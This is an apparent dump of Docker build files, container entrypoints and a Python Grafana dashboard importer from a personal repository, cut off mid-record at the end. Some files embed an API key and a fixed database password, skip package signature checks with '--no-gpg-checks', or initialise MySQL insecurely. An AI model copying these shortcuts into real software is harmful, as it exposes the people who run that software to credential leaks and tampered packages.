"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/alpine-nginx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add nginx\nRUN rm -rf /var/cache/apk/*\n\nCOPY nginx.conf /etc/nginx/nginx.conf\n\nVOLUME \"/var/www/localhost/htdocs/\" \nVOLUME \"/etc/nginx/conf.d/\" \nCOPY entrypoint.sh /bin/\nRUN chmod +x /bin/entrypoint.sh\n\nEXPOSE 80 443\nCMD [\"/bin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.7228177785873413,
"alphanum_fraction": 0.768759548664093,
"avg_line_length": 35.27777862548828,
"blob_id": "d465f531edb97fb9d9039bea6ef390d2b2a30412",
"content_id": "c410c76f7dcae3de9969a5aa0ec76caeebbd989e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 18,
"path": "/suse-apache/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper ref -s && zypper in -y apache2 php5 php5-mysql apache2-mod_php5 php5-json php5-gd php5-dom php5-zlib php5-openssl php5-curl\nRUN zypper clean -a\n\nCOPY vhost.conf /etc/apache2/conf.d/vhost.conf\nCOPY entrypoint.sh /etc/entrypoint.sh\nRUN chmod 755 /etc/entrypoint.sh\nRUN echo \"LoadModule php5_module /usr/lib64/apache2/mod_php5.so\" >> /etc/apache2/loadmodule.conf\nRUN sed -i 's/^DirectoryIndex.*$/DirectoryIndex index.php index.html index.html.var/g' /etc/apache2/httpd.conf\n\nEXPOSE 80/tcp\nEXPOSE 443/tcp\nENTRYPOINT [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.5642458200454712,
"alphanum_fraction": 0.6424580812454224,
"avg_line_length": 21.375,
"blob_id": "bfb853141c47fe5ec2841288a3b19dcc0364fd64",
"content_id": "cf69e3fff2df105f3ecdb30cdda72a7ba7c4dbc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 8,
"path": "/docker-compose/squid/docker-compose.yml",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "squid_fx:\n image: alpine-squid\n ports:\n - \"127.0.0.1:3128:3128\"\n environment:\n - \"SQUID_CACHE_DIR=/var/cache/squid\"\n - \"SQUID_LOG_DIR=/var/log/squid\"\n - \"SQUID_USER=squid\"\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 24.714284896850586,
"blob_id": "138f2bb2d988b018655124723ecc2fe4812f9e9c",
"content_id": "de59fea76d2d5f1490593957658430e5258e188a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 14,
"path": "/alpine-squid/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash -x\n\nNAME=\"alpine-squid\"\nIP_VHOST=\"10.11.66.131 10.11.12.125\"\n\n####\nfor IP in $IP_VHOST ; do\n PORTS_OPTS=\"$PORTS_OPTS -p $IP:3128:3128\"\ndone\n#PORTS_OPTS=\"--publish-all\"\n\npodman run -d -it -h $NAME --name $NAME $VOL_OPTS $PORTS_OPTS localhost/alpine-squid\nsudo firewall-cmd --zone=public --add-port=3128/tcp --permanent\nsudo firewall-cmd --reload\n"
},
{
"alpha_fraction": 0.6532618403434753,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 30.97142791748047,
"blob_id": "b530d15371d33dc54b7c5175bf4ad887aa6e2efd",
"content_id": "643f9119c358bc01352204406de39c10ed9bc3bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 35,
"path": "/alpine-grafana/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nENV GRAFANA_VERSION=8.4.1\nRUN apk --no-cache add openssl wget\n\nENV PATH=/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \\\n GF_USER=\"grafana\" \\\n GF_GROUP=\"grafana\" \\\n GF_PATHS_CONFIG=\"/etc/grafana/grafana.ini\" \\\n GF_PATHS_DATA=\"/var/lib/grafana\" \\\n GF_PATHS_HOME=\"/usr/share/grafana\" \\\n GF_PATHS_LOGS=\"/var/log/grafana\" \\\n GF_PATHS_PLUGINS=\"/var/lib/grafana/plugins\" \\\n GF_PATHS_PROVISIONING=\"/etc/grafana/provisioning\"\n\nRUN mkdir /tmp/grafana ${GF_PATHS_HOME} \\\n && wget -q -P /tmp/ https://dl.grafana.com/oss/release/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz \\\n && tar xfz /tmp/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz --strip-components=1 -C ${GF_PATHS_HOME} \\\n && rm /tmp/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz\n\n\nRUN mkdir -p \"$GF_PATHS_HOME\"\nWORKDIR $GF_PATHS_HOME \n\nRUN set -ex \\\n && addgroup -S $GF_GROUP \\\n && adduser -S -G $GF_GROUP $GF_USER \\\n && apk add --no-cache libc6-compat ca-certificates su-exec bash\n\nCOPY ./config/grafana.ini \"$GF_PATHS_CONFIG\"\nCOPY ./run.sh /run.sh\n\nEXPOSE 3000\n\nCMD [\"/run.sh\"]\n"
},
{
"alpha_fraction": 0.6683416962623596,
"alphanum_fraction": 0.6817420721054077,
"avg_line_length": 48.75,
"blob_id": "dcf8c36e101e1ecf002b6562da9f126e901f439d",
"content_id": "b3aece1d1c0487d031be6db2a79e7485d80d438e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 251,
"num_lines": 12,
"path": "/suse-percona/grafana-postinstall.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -eu\n\n#service grafana-server start\n/etc/init.d/grafana-server start\n\npython /opt/import-dashboards.py\n\n# Apply interval fix\nsed -i 's/expr=\\(.\\)\\.replace(\\(.\\)\\.expr,\\(.\\)\\.scopedVars\\(.*\\)var \\(.\\)=\\(.\\)\\.interval/expr=\\1.replace(\\2.expr,\\3.scopedVars\\4var \\5=\\1.replace(\\6.interval, \\3.scopedVars)/' /usr/share/grafana/public/app/plugins/datasource/prometheus/datasource.js\nsed -i 's/,range_input/.replace(\\/\"{\\/g,\"\\\\\"\").replace(\\/}\"\\/g,\"\\\\\"\"),range_input/; s/step_input:\"\"/step_input:this.target.step/' /usr/share/grafana/public/app/plugins/datasource/prometheus/query_ctrl.js\n"
},
{
"alpha_fraction": 0.6972602605819702,
"alphanum_fraction": 0.7260273694992065,
"avg_line_length": 28.200000762939453,
"blob_id": "1f1555921502f6a8c2a3db7704b44722a13defc2",
"content_id": "1bb6f6785ad8af58f61a4b45e4ebbf9a59077a72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 730,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 25,
"path": "/suse-apache/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nAPACHE_VERSION=\"2.4.10\"\nAPACHE_MOUNT=\"/www\"\nAPACHE_CONF=\"/etc/apache2/conf.d\"\nAPACHE_DIR=\"/var/www\"\nAPACHE_LOG_DIR=\"/var/log/apache2\"\nAPACHE_USER=\"wwwrun\"\nAPACHE_GROUP=\"www\"\n\nAPACHE_INCLUDE_DIR=\"/etc/apache2/sysconfig.d\"\nchown -R $APACHE_USER:$APACHE_GROUP $APACHE_DIR\n\nmkdir $APACHE_INCLUDE_DIR\ntouch $APACHE_INCLUDE_DIR/include.conf\n\n#Specific to OpenSuse\nsed -i 's/DocumentRoot.*/DocumentRoot \"\\/var\\/www\"/g' /etc/apache2/default-server.conf\nsed -i -r 's/^upload_max_filesize.*$/upload_max_filesize = 20M/g' /etc/php5/apache2/php.ini\necho \"LoadModule php5_module /usr/lib64/apache2/mod_php5.so\" >> /etc/apache2/sysconfig.d/loadmodule.conf\n\na2enmod rewrite\na2enmod php \n\napache2ctl -D FOREGROUND\n"
},
{
"alpha_fraction": 0.5866873264312744,
"alphanum_fraction": 0.599071204662323,
"avg_line_length": 18.57575798034668,
"blob_id": "533b098fd3df82d7bbdb1b0017eb1da468997a8f",
"content_id": "6319eafb6eb602b7a1717fe90a87be154d4658dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 646,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 33,
"path": "/alpine-squid/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nset -e\n\ncreate_log_dir() {\n mkdir -p $SQUID_LOG_DIR\n chmod -R 755 $SQUID_LOG_DIR\n chown -R $SQUID_USER $SQUID_LOG_DIR\n}\n\ncreate_cache_dir () {\n mkdir -p $SQUID_CACHE_DIR\n chown -R $SQUID_USER $SQUID_CACHE_DIR\n squid -z -F &\n PID=$!\n wait $(pgrep -P $PID)\n}\n\ncreate_log_dir\ncreate_cache_dir\nsleep 5\n\n# default behaviour is to launch squid\nif [[ -z ${1} ]]; then\n if [[ ! -d ${SQUID_CACHE_DIR}/00 ]]; then\n echo \"Initializing cache...\"\n $(which squid) -N -f /etc/squid/squid.conf -z\n fi\n echo \"Starting squid...\"\n exec $(which squid) -f /etc/squid/squid.conf -NYCd 1 ${EXTRA_ARGS}\nelse\n exec \"$@\"\nfi\n"
},
{
"alpha_fraction": 0.6754385828971863,
"alphanum_fraction": 0.7258771657943726,
"avg_line_length": 29.399999618530273,
"blob_id": "273ff43efcbef256efdd1d751a0b2ac59b4a9fa2",
"content_id": "b30279739ac6c506b27026674b04f38b8baed94b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 30,
"path": "/suse-nginx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n# make sure the repositories are up to date\n#RUN cd /tmp/ && wget http://download.opensuse.org/repositories/home:/stargieg:/branches:/home:/microchip8/openSUSE_13.2/x86_64/nginx-1.7.7-13.1.x86_64.rpm\n#RUN rpm -ivh /tmp/nginx-1.7.7-13.1.x86_64.rpm\n#RUN systemctl enable nginx\nRUN zypper ar http://download.opensuse.org/repositories/home:/microchip8/openSUSE_Factory/ \"Micro Chip 8\"\nRUN zypper --no-gpg-checks install -y nginx\n\n\n\n#echo \"\\ndaemon off;\" >> /etc/nginx/nginx.conf && \\\n#chown -R www-data:www-data /var/lib/nginx\n\n# Define mountable directories.\nVOLUME [\"/etc/nginx/sites-enabled\", \"/etc/nginx/certs\", \"/etc/nginx/conf.d\", \"/var/log/nginx\", \"/var/www/html\"]\n\n# Define working directory.\nWORKDIR /etc/nginx\n\n# Define default command.\nCMD [\"nginx\"]\n\n# Expose ports.\nEXPOSE 80\nEXPOSE 443\n"
},
{
"alpha_fraction": 0.7156704068183899,
"alphanum_fraction": 0.723747968673706,
"avg_line_length": 29.950000762939453,
"blob_id": "9593dcdf9aae0bbc2debc416a9e131cc48f5ec4f",
"content_id": "7e6d77f304e59c01b9c92ead3d5dc99847adf13a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 20,
"path": "/suse-percona/qan-install.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -eu\n\n#service mysql start\n#/etc/init.d/mysql start\n/usr/sbin/mysqld --initialize-insecure --user=mysql\n/usr/sbin/mysqld --user=mysql &\nsleep 5\n\n# Create Orchestrator db.\nmysql -vv -e \"CREATE DATABASE IF NOT EXISTS orchestrator; GRANT ALL PRIVILEGES ON orchestrator.* TO 'orchestrator'@'localhost' IDENTIFIED BY 'orchestrator'\"\n\n# Install QAN API.\n# START=no SYSINT=no because Supervisor starts and manages these processes.\ncd /opt/qan-api\nSTART=\"no\" SYSINT=\"no\" ./install\n\n# Define /qan-api path for QAN app\nsed -i \"s/':9001',/':' + window.location.port + '\\/qan-api',/\" /opt/qan-app/client/app/app.js\n"
},
{
"alpha_fraction": 0.7361111044883728,
"alphanum_fraction": 0.7361111044883728,
"avg_line_length": 71,
"blob_id": "fb4dcf9d7e28fce26d21d7119e97f1cde3053d69",
"content_id": "a788821ed2bfa9f4379d9021d456e68591b1050d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 1,
"path": "/suse-gcc/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "docker run -d --name gcc -v /appsef/GIT/OPENSUSE:/var/data opensuse-gcc\n"
},
{
"alpha_fraction": 0.7439024448394775,
"alphanum_fraction": 0.7439024448394775,
"avg_line_length": 26.33333396911621,
"blob_id": "5f1792310b51694bdd9c326578da70f707486d0d",
"content_id": "35225dfeec55d915d9a7290bec95ccdc100a8f39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 21,
"path": "/alpine-nginx-fx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\n\nRUN apk update && apk add bash nginx\nRUN rm -rf /var/cache/apk/*\n\n\nRUN mkdir /etc/nginx/global/\nCOPY default.conf /etc/nginx/conf.d/default.conf\nCOPY wordpress.conf /etc/nginx/global/wordpress.conf\nCOPY restrictions.conf /etc/nginx/global/restrictions.conf\nCOPY proxy.conf /etc/nginx/global/proxy.conf\nCOPY docker-entrypoint.sh /bin/entrypoint.sh\nRUN chmod +x /bin/entrypoint.sh\nRUN mkdir /var/www/html/\n\nVOLUME \"/var/www/html/\" \nVOLUME \"/etc/nginx/global/\" \n\nWORKDIR \"/var/www/html/\"\nENTRYPOINT [\"/bin/entrypoint.sh\"]\nCMD [\"nginx\", \"-g\", \"daemon off;\"]\n"
},
{
"alpha_fraction": 0.5562279224395752,
"alphanum_fraction": 0.5706000924110413,
"avg_line_length": 32.61016845703125,
"blob_id": "3502a7ee593f77b612385c1d97bc69649c99343c",
"content_id": "3f3057c9587da0499487e8dbbd8c831b2f006a72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3966,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 118,
"path": "/suse-percona/import-dashboards.py",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# Grafana dashboard importer script.\n\nimport json\nimport os\nimport requests\nimport shutil\nimport sqlite3\nimport sys\nimport time\n\nDIR = '/opt/grafana-dashboards/dashboards/'\n\n\ndef main():\n host = 'http://127.0.0.1:3000'\n api_key = 'eyJrIjoiSjZXMmM0cUpQdFp0djJRUThWMlJzNlVXQmhwRjJvVm0iLCJuIjoiUE1NIERhc2hib2FyZCBJbXBvcnQiLCJpZCI6MX0='\n db_key = '6176c9bca5590c39fc29d54b4a72e9fac5e4e8fdb75965123668d420f7b07a2d9443ad60cb8d36a1084c0fc73f3c387c0415'\n headers = {'Authorization': 'Bearer %s' % (api_key,), 'Content-Type': 'application/json'}\n\n upgrade = False\n if len(sys.argv) > 1 and sys.argv[1] == 'upgrade':\n upgrade = True\n\n # On upgrade - check versions whether to re-import dashboards.\n if upgrade:\n ver1 = 'N/A'\n if os.path.exists('/var/lib/grafana/VERSION'):\n with open('/var/lib/grafana/VERSION', 'r') as f:\n ver1 = f.read().strip()\n\n with open('/opt/VERSION', 'r') as f:\n ver2 = f.read().strip()\n\n if ver1 == ver2:\n print '* The dashboards are up-to-date (%s).' % (ver1,)\n sys.exit(0)\n\n # Insert key into Grafana sqlite db.\n con = sqlite3.connect('/var/lib/grafana/grafana.db')\n cur = con.cursor()\n cur.execute(\"REPLACE INTO api_key (org_id, name, key, role, created, updated) \"\n \"VALUES (1, 'PMM Dashboard Import', '%s', 'Admin', datetime('now'), datetime('now'))\" % (db_key,))\n con.commit()\n\n # Wait for Grafana to start and get datasources.\n for _ in xrange(30):\n try:\n r = requests.get('%s/api/datasources' % (host,), headers=headers)\n except requests.exceptions.ConnectionError:\n print 'Waiting for Grafana to start...'\n time.sleep(1)\n else:\n break\n\n # Add datasources.\n ds = [x['name'] for x in json.loads(r.content)]\n if 'Prometheus' not in ds:\n data = json.dumps({'name': 'Prometheus', 'type': 'prometheus', 'url': 'http://127.0.0.1:9090/prometheus/', 'access': 'proxy', 'isDefault': True})\n r = requests.post('%s/api/datasources' % (host,), data=data, headers=headers)\n print r.status_code, r.content\n if r.status_code != 200:\n sys.exit(-1)\n\n if 'CloudWatch' not in ds:\n data = json.dumps({'name': 'CloudWatch', 'type': 'cloudwatch', 'jsonData': '{\"defaultRegion\":\"us-west-2\"}', 'access': 'proxy', 'isDefault': False})\n r = requests.post('%s/api/datasources' % (host,), data=data, headers=headers)\n print r.status_code, r.content\n if r.status_code != 200:\n sys.exit(-1)\n\n # Import dashboards with overwrite.\n files = []\n for f in os.listdir(DIR):\n if not f.endswith('.json'):\n continue\n\n files.append(DIR + f)\n\n for file_ in files:\n print file_\n f = open(file_, 'r')\n dash = json.load(f)\n f.close()\n\n # Set time range and refresh options.\n dash['time']['from'] = 'now-1h'\n dash['time']['to'] = 'now'\n dash['refresh'] = '1m'\n\n data = json.dumps({'dashboard': dash, 'overwrite': True})\n r = requests.post('%s/api/dashboards/db' % (host,), data=data, headers=headers)\n if r.status_code != 200:\n print r.status_code, r.content\n sys.exit(-1)\n\n # Set home dashboard.\n if not upgrade:\n cur.execute(\"REPLACE INTO star (user_id, dashboard_id) \"\n \"SELECT 1, id from dashboard WHERE slug='cross-server-graphs'\")\n cur.execute(\"REPLACE INTO preferences (id, org_id, user_id, version, home_dashboard_id, timezone, theme, created, updated) \"\n \"SELECT 1, 1, 1, 0, id, '', '', datetime('now'), datetime('now') from dashboard WHERE slug='cross-server-graphs'\")\n\n # Delete key.\n cur.execute(\"DELETE FROM api_key WHERE key='%s'\" % (db_key,))\n\n con.commit()\n con.close()\n\n # On upgrade - update 
VERSION file.\n if upgrade:\n shutil.copyfile('/opt/VERSION', '/var/lib/grafana/VERSION')\n print '* Dashboards upgraded successfully from version %s to %s.' % (ver1, ver2)\n\n\nif __name__ == '__main__':\n main()\n"
},
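The importer above drives Grafana's HTTP API from Python 2. Below is a minimal Python 3 sketch of the same dashboard-import call; the host, API key, and file name are placeholder assumptions, not values taken from the script.

import json
import requests

GRAFANA = "http://127.0.0.1:3000"                   # assumed local Grafana
HEADERS = {"Authorization": "Bearer YOUR_API_KEY",  # placeholder key
           "Content-Type": "application/json"}

with open("dashboard.json") as f:                   # any exported dashboard JSON
    dashboard = json.load(f)

# POST /api/dashboards/db creates the dashboard, or replaces it when
# 'overwrite' is true; this is the same endpoint the importer uses.
payload = json.dumps({"dashboard": dashboard, "overwrite": True})
r = requests.post(GRAFANA + "/api/dashboards/db", data=payload, headers=HEADERS)
r.raise_for_status()
print(r.json())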
{
"alpha_fraction": 0.6160815358161926,
"alphanum_fraction": 0.6308040618896484,
"avg_line_length": 22.236841201782227,
"blob_id": "76f20f2c9811f03634b4fca5fea26c065d548078",
"content_id": "1c5d24ac2d46ff7facdf60d8e078895b93f7f7da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 38,
"path": "/alpine-nginx/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nset -e\n\n[[ $DEBUG == true ]] && set -x\n\ncreate_log_dir() {\n mkdir -p ${NGINX_LOG_DIR}\n chmod -R 0755 ${NGINX_LOG_DIR}\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_LOG_DIR}\n}\n\ncreate_tmp_dir(){\n mkdir -p ${NGINX_TEMP_DIR}\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_TEMP_DIR} \n}\n\ncreate_siteconf_dir() {\n mkdir -p ${NGINX_SITECONF_DIR}\n chmod -R 755 ${NGINX_SITECONF_DIR}\n}\n\nchange_owner_site_dir(){\n if [ ! -e \"${NGINX_SITE_DIR}\" ]; then\n mkdir -p ${NGINX_SITE_DIR}\n fi\n find ${NGINX_SITE_DIR} -type d -exec chmod 755 {} \\;\n find ${NGINX_SITE_DIR} -type f -exec chmod 644 {} \\;\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_SITE_DIR}\n}\n\ncreate_log_dir\ncreate_tmp_dir\ncreate_siteconf_dir\nchange_owner_site_dir\n\n# default behaviour is to launch nginx\necho \"Starting nginx...\"\nexec $(which nginx) -c /etc/nginx/nginx.conf -g \"daemon off;\" ${EXTRA_ARGS}\n"
},
{
"alpha_fraction": 0.7009708881378174,
"alphanum_fraction": 0.7106795907020569,
"avg_line_length": 31.1875,
"blob_id": "56de46a61d6b23090ebd9ddbad6ea25eb601cb15",
"content_id": "9f66752fe88d9040ad3fbe1694f8aff54c9886fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 16,
"path": "/centos-ssh/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM centos:8\nMAINTAINER ffx <[email protected]>\n\n\nENV TERM=xterm\nENV NOTVISIBLE \"in users profile\"\nRUN yum -y update && yum -y install openssh-server\nRUN /usr/bin/ssh-keygen -f /etc/ssh/ssh_host_ecdsa_key -N '' -t ecdsa\n\n# SSH login fix. Otherwise user is kicked off after login\nRUN sed 's@session\\s*required\\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd\nRUN echo \"export VISIBLE=now\" >> /etc/profile\nRUN sed -i 's/^#Port.*$/Port 77/g' /etc/ssh/sshd_config\n\nCMD [\"/usr/sbin/sshd\", \"-D\"]\nEXPOSE 77\n"
},
{
"alpha_fraction": 0.6634746789932251,
"alphanum_fraction": 0.6867305040359497,
"avg_line_length": 28.239999771118164,
"blob_id": "4d7be39cede38f17ca1178f5c7f1ed56a1e4a8b0",
"content_id": "b57b7f1da055e87d5005f83c8bcb088ece09ef1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 50,
"path": "/alpine-django-template/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "PROJECT=\"alpha3\"\nDIRECTORY=\"$HOME/Projects/Django\"\nSHARES=\"${PROJECT}\"\nIP_VHOST=\"10.11.66.1 10.11.12.1 192.168.0.43\"\nDOCKER_CMD=\"podman\"\nDOCKER_PORTS=\"83\"\nDOCKER_ARGS=\"--cpus=1 -m 1g\"\nDOCKER_IMG_NAME=\"django-template\"\nDOCKER_CNT_NAME=\"--name django-${PROJECT}\"\nDOCKER_CMD_ARGS=\"\"\n\n# Allow users to bind on low ports\nsudo sysctl -w net.ipv4.ip_unprivileged_port_start=0 &>/dev/null\n\n# Allow samba port on firewalld\nsudo firewall-cmd --add-service=http --permanent &>/dev/null\nsudo systemctl restart firewalld &>/dev/null\n\n# Allow users to limit cpu in systemd configuration (rootless)\nif [ ! -f \"/etc/systemd/system/user\\@.service.d/delegate.conf\" ] ; then\n sudo mkdir /etc/systemd/system/user\\@.service.d &>/dev/null\n cat << EOF | sudo tee /etc/systemd/system/user\\@.service.d/delegate.conf &>/dev/null\n[Service]\nDelegate=memory pids cpu io\nEOF\nsudo systemctl daemon-reload &>/dev/null\nfi\n\n# Bind port on multiple interface\nfor IP in ${IP_VHOST} ; do\n DOCKER_PORTS_BIND=\"${DOCKER_PORTS_BIND} -p ${IP}:${DOCKER_PORTS}:8000\"\ndone\n\n# Create local shares if not present\nfor SHARE in ${SHARES} ; do\n if [ ! -d \"${DIRECTORY}/${SHARE}\" ] ; then\n\tmkdir -p ${DIRECTORY}/${SHARE}\n fi\n DOCKER_VOLUMES=\"${DOCKER_VOLUMES} -v ${DIRECTORY}/${SHARE}:/code:Z\"\ndone\n\nCMD=\"${DOCKER_CMD} run --rm -it -d --hostname ${DOCKER_IMG_NAME} \\\n${DOCKER_ARGS} \\\n${DOCKER_CNT_NAME} \\\n${DOCKER_PORTS_BIND} \\\n${DOCKER_VOLUMES} \\\n${DOCKER_IMG_NAME} \\\n${DOCKER_CMD_ARGS}\"\n\n$CMD\n"
},
{
"alpha_fraction": 0.571090042591095,
"alphanum_fraction": 0.6350710988044739,
"avg_line_length": 16.58333396911621,
"blob_id": "7b75634a55453d2b185e22cd777a5bdb7e0b1474",
"content_id": "f9fb7f1fee388dc7ecbcfbf6eec87f38db7e657a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 24,
"path": "/suse-git/docker-run-server.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 ] ; then\n\techo \"Usage: $0 hostname\"\n\texit 1\nfi\n\n\nHOSTNAME=$1\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/git/$HOSTNAME\"\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY\nfi\n\ndocker run -it -d -h $HOSTNAME \\\n--name $HOSTNAME \\\n-p $VIP:22:22 \\\n-p $VIP:9418:9418 \\\n-p $VIP:80:80 \\\n-p $VIP:443:443 \\\n-v $ENV_DIRECTORY/repository:/data/repository \\\nsuse-git\n"
},
{
"alpha_fraction": 0.6975914239883423,
"alphanum_fraction": 0.7261373996734619,
"avg_line_length": 31.97058868408203,
"blob_id": "6fc556aab481c299e7914bf71ab012d5eea7ea77",
"content_id": "ba5951c93a60c645d7a1543052cb7c5825178b5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/alpine-tor/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\nLABEL 'label'='haproxy_tor'\n\nENV TOR_DIR=\"/haproxy_tor\"\nRUN apk update\nRUN apk upgrade\nRUN apk add \\\n haproxy ruby shadow bash-completion tor \\\n ruby-irb ruby-rake ruby-io-console ruby-bigdecimal ruby-json ruby-bundler ruby-dev \\\n --update \\\n --no-cache \\\n --repository http://dl-cdn.alpinelinux.org/alpine/edge/community \\\n --repository http://dl-cdn.alpinelinux.org/alpine/edge/main\n\nCMD mkdir -p $TOR_DIR/run_area/\nADD haproxy.cfg.erb $TOR_DIR/run_area/haproxy.cfg.erb\nADD proxy_setup.rb $TOR_DIR/run_area/proxy_setup.rb\nADD torrc.cfg.erb $TOR_DIR/run_area/torrc.cfg.erb\nADD run_haproxy_tor.rb $TOR_DIR/run_area/run_haproxy_tor.rb\nRUN chmod +x $TOR_DIR/run_area/run_haproxy_tor.rb\n\nENV haproxy_cfg_erb=$TOR_DIR/run_area/haproxy.cfg.erb\nENV haproxy_port=10000\nENV haproxy_stat_port=10100\nENV number_of_tors=10\nENV torrc_cfg_erb=$TOR_DIR/run_area/torrc.cfg.erb\nENV starting_tor_http_tunnel_port=15000\nENV tor_exit_node=us\nENV username=username\nENV password=password\n\nCMD ruby /haproxy_tor/run_area/run_haproxy_tor.rb\n\nEXPOSE 10000 10100 15000\n"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "ce73f96f86505aa5245c0b15d726db8e24475ee2",
"content_id": "a232c6c224901bcf741ef42115c447489ef231bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/suse-torrent/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nwhile true ; do\n\tsleep 100000\ndone\n"
},
{
"alpha_fraction": 0.7123655676841736,
"alphanum_fraction": 0.7526881694793701,
"avg_line_length": 18.578947067260742,
"blob_id": "46cee6a4cc18dfe67519b45320fc78177bcd4d6c",
"content_id": "8c7e83a9983d036ce5b5eaa408ebb156f6c7b74a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/suse-ftp/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
